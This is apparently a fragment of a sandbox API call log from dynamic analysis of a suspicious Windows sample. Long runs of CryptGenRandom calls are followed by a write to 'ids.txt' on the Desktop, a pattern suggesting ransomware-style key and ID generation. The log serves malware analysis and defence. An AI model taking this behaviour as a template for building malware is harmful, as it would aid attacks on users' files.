dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.470] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.470] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.470] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.471] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.471] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.471] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.472] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.472] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.472] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.473] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.473] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.473] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.474] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.474] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.474] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.475] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.475] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.475] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.475] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.475] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.475] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.476] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.476] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.476] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.477] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.477] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.477] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.478] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.478] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.478] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.478] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.478] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.478] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.479] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.479] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.479] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.480] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.480] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.480] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.480] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.480] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.481] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.481] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.481] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.481] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.482] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.482] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.485] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.486] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.486] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.486] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.487] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.487] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.487] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.488] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.488] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.488] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.488] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.488] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.489] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.489] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.489] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.489] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.490] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.490] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.490] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.491] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.491] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.491] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.491] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.492] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.492] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.492] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.492] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.492] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.493] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.493] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.493] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.494] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.494] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.494] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.494] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.494] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.495] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.495] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.495] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.495] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.496] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.496] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.499] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.500] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.500] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.500] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.501] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.501] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.501] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.501] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.501] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.501] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.502] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.502] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.502] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.749] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.749] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.749] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.750] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.750] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.750] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.751] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.751] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.751] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.752] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.752] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.752] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.753] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.753] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.753] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.753] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.753] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.753] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.754] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.754] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.754] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.755] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.755] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.755] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.756] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.756] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.756] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.756] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.756] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.756] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.757] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.757] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.757] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.758] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.758] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.758] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.758] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.758] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.759] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.759] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.759] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.759] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.760] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.760] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.760] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.761] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.761] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.761] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.761] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.761] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.761] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.762] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.762] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.762] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.763] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.763] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.763] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.764] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.764] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.764] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.765] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.765] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.765] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.765] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.765] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.765] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.766] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.766] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.766] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.767] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.767] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.767] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.768] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.768] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.768] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.768] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.768] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.769] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.769] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.769] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.772] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.773] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.773] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.773] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.774] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.774] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.774] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.775] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.775] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.775] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.775] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.775] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.775] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.776] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.776] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0038.569] lstrcpynA (in: lpString1=0x2add0d, lpString2="local", iMaxLength=59 | out: lpString1="local") returned="local" [0038.576] lstrcatA (in: lpString1="", lpString2="\r\n\r\n" | out: lpString1="\r\n\r\n") returned="\r\n\r\n" [0038.576] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0038.581] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0038.581] WriteFile (in: hFile=0x80, lpBuffer=0x2c7ff0*, nNumberOfBytesToWrite=0x41b, lpNumberOfBytesWritten=0x2adbc0, lpOverlapped=0x0 | out: lpBuffer=0x2c7ff0*, lpNumberOfBytesWritten=0x2adbc0*=0x41b, lpOverlapped=0x0) returned 1 [0038.582] CloseHandle (hObject=0x80) returned 1 [0038.583] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c7ff0 | out: hHeap=0x2b0000) returned 1 [0038.583] GetSystemInfo (in: lpSystemInfo=0x12adba0 | out: lpSystemInfo=0x12adba0*(dwOemId=0x0, 